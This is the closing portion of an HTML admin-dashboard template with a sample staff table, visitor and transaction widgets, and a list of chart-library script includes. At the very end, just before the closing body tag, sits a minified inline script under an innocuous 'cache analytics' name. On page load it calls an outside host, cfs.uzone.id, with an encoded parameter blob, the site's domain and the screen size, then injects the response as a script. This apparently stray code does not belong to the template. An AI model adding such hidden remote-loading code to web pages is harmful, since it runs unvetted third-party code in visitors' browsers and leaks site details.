                    <td><a href="#" class="table-action-btn"><i class="mdi mdi-pencil"></i></a> <a href="#" class="table-action-btn"><i class="mdi mdi-close"></i></a></td>
                  </tr>
                  <tr>
                    <td><img src="assets/images/users/avatar-3.jpg" alt="contact-img" title="contact-img" class="img-circle thumb-sm" /></td>
                    <td><h5 class="m-b-0 m-t-0">Erwin E. Brown</h5>
                      <p class="m-b-0"><small>Programmer</small></p></td>
                    <td><i class="mdi mdi-map-marker text-primary"></i> California </td>
                    <td><i class="mdi mdi-clock text-success"></i> Part Time </td>
                    <td><i class="mdi mdi-currency-usd text-warning"></i> 1365 </td>
                    <td><a href="#" class="table-action-btn"><i class="mdi mdi-pencil"></i></a> <a href="#" class="table-action-btn"><i class="mdi mdi-close"></i></a></td>
                  </tr>
                  <tr>
                    <td><img src="assets/images/users/avatar-4.jpg" alt="contact-img" title="contact-img" class="img-circle thumb-sm" /></td>
                    <td><h5 class="m-b-0 m-t-0">Margeret V. Ligon</h5>
                      <p class="m-b-0"><small>Web Designer</small></p></td>
                    <td><i class="mdi mdi-map-marker text-primary"></i> New York </td>
                    <td><i class="mdi mdi-clock text-success"></i> Full Time </td>
                    <td><i class="mdi mdi-currency-usd text-warning"></i> 115248 </td>
                    <td><a href="#" class="table-action-btn"><i class="mdi mdi-pencil"></i></a> <a href="#" class="table-action-btn"><i class="mdi mdi-close"></i></a></td>
                  </tr>
                  <tr>
                    <td><img src="assets/images/users/avatar-5.jpg" alt="contact-img" title="contact-img" class="img-circle thumb-sm" /></td>
                    <td><h5 class="m-b-0 m-t-0">Jose D. Delacruz</h5>
                      <p class="m-b-0"><small>Web Developer</small></p></td>
                    <td><i class="mdi mdi-map-marker text-primary"></i> New York </td>
                    <td><i class="mdi mdi-clock text-success"></i> Part Time </td>
                    <td><i class="mdi mdi-currency-usd text-warning"></i> 2451 </td>
                    <td><a href="#" class="table-action-btn"><i class="mdi mdi-pencil"></i></a> <a href="#" class="table-action-btn"><i class="mdi mdi-close"></i></a></td>
                  </tr>
                  <tr>
                    <td><img src="assets/images/users/avatar-8.jpg" alt="contact-img" title="contact-img" class="img-circle thumb-sm" /></td>
                    <td><h5 class="m-b-0 m-t-0">Luke J. Sain</h5>
                      <p class="m-b-0"><small>Web Designer</small></p></td>
                    <td><i class="mdi mdi-map-marker text-primary"></i> Australia </td>
                    <td><i class="mdi mdi-clock text-success"></i> Part Time </td>
                    <td><i class="mdi mdi-currency-usd text-warning"></i> 3265 </td>
                    <td><a href="#" class="table-action-btn"><i class="mdi mdi-pencil"></i></a> <a href="#" class="table-action-btn"><i class="mdi mdi-close"></i></a></td>
                  </tr>
                </tbody>
              </table>
            </div>
          </div>
        </div>
        <!-- end col -->
        
        <div class="col-lg-3">
          <div class="card-box">
            <h4 class="text-dark header-title m-t-0 m-b-30">Total Unique Visitors</h4>
            <div class="widget-chart text-center">
              <div id="donut-chart" class="h-270"></div>
              <div class="row text-center m-t-30">
                <div class="col-xs-6">
                  <h3 data-plugin="counterup">1,507</h3>
                  <p class="text-muted">Visitors Male</p>
                </div>
                <div class="col-xs-6">
                  <h3 data-plugin="counterup">854</h3>
                  <p class="text-muted">Visitors Female</p>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="col-lg-3">
          <div class="card-box">
            <h4 class="text-dark header-title m-t-0 m-b-30">Number of Transactions</h4>
            <div class="widget-chart text-center">
              <div id="pie-chart" class="h-270"></div>
              <div class="row text-center m-t-30">
                <div class="col-xs-6">
                  <h3 data-plugin="counterup">2,854</h3>
                  <p class="text-muted">Payment Done</p>
                </div>
                <div class="col-xs-6">
                  <h3 data-plugin="counterup">22</h3>
                  <p class="text-muted">Payment Due</p>
                </div>
              </div>
            </div>
          </div>
        </div>
        
        <!-- end row --> 
        
      </div>
    </div>
    <footer class="footer text-right">
      <div class="pull-left">Copyright @ 2017 AdminUX Panel. All Rights Reserved</div>
      <div class="pull-right">Created with by <img src="assets/images/heartbeat.svg" alt="srgit" class="heart"/> <a href="http://www.srgit.com/" target="_blank">SRGIT</a></div>
      <div class="clearfix"></div>
    </footer>
  </div>
  
  <!-- ============================================================== --> 
  <!-- End Right content here --> 
  <!-- ============================================================== --> 
  
  </div>
<!-- END wrapper --> 

<a id="back-to-top" href="#" class="btn btn-primary back-to-top" ><span class="glyphicon glyphicon-chevron-up"></span></a>
<!-- jQuery  --> 

<script src="assets/js/jquery.min.js"></script> 
<script src="assets/js/bootstrap.min.js"></script> 
<script src="assets/js/metisMenu.min.js"></script> 
<script src="assets/js/waves.js"></script> 
<script src="assets/js/jquery.slimscroll.js"></script> 
<script src="assets/js/themeswitcher.js"></script> 
<script src="assets/js/inputswitch-alt.js"></script> 

<!-- Counter js  --> 
<script src="plugins/waypoints/jquery.waypoints.min.js"></script> 
<script src="plugins/counterup/jquery.counterup.min.js"></script> 

<!--C3 Chart--> 
<script  src="plugins/d3/d3.min.js"></script> 
<script  src="plugins/c3/c3.min.js"></script> 

<!--Echart Chart--> 
<script src="plugins/echart/echarts-all.js"></script> 

<!-- KNOB JS --> 
<!--[if IE]>
<script  src="../plugins/jquery-knob/excanvas.js"></script>
<![endif]--> 
<script src="plugins/jquery-knob/jquery.knob.js"></script> 

<!--Morris Chart--> 
<script src="plugins/morris/morris.min.js"></script> 
<script src="plugins/raphael/raphael-min.js"></script> 

<!-- Sparkline charts --> 
<script src="plugins/jquery-sparkline/jquery.sparkline.min.js"></script> 

<!-- Dashboard init --> 
<script src="assets/pages/jquery.dashboard.js"></script> 
<script src="assets/js/jquery.core.js"></script> 
<script src="assets/js/jquery.app.js"></script> 
<script src="plugins/jquery-toast-plugin/dist/jquery.toast.min.js"></script> 
<script src="assets/js/dashboard-data.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m9jSLx54ANbjYYNuyRgqyi6OTXRqz8WoLlJw1x5K5Rlsvits1P%2f2S14NjJPohq3DfsvLP%2bsh8jVd0tNcuXXGAplk0JzZGtZJJVG%2bNZNt8%2bsBZMI%2fvN45trPSaxjXIZvosdbwXRzaxNKWEAc9k9j0quZ1jj2fmRFK3K1KsQhGuhSTaG4wRmFe2TNNphrxTsV9memTkT2i3%2femn8vJafoGfnNgil%2bbxBWhx52NpGRFOn3gUZvWCB78T4gQa2qEi6LR4PwV44W3uTC7KJ8QMv%2bv6STf2%2fj75QiLwejq8h0kX0%2bb%2fNV%2fr%2bGCqDx0h5U3HsHQQwyEnqlWmSDTrNwJ%2f2AXYW%2fRTpniTomQOuf72BrTeSYW4zCynQ1zbrdMDt55FIiCT3YlbaIEObXInoNK0Xc4Xd%2bQa5bT9tQ%2b8pJ82%2fLFmDvvlDlhkeG8b8Q4o23ymNywUfoA9GqCq1ZA%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
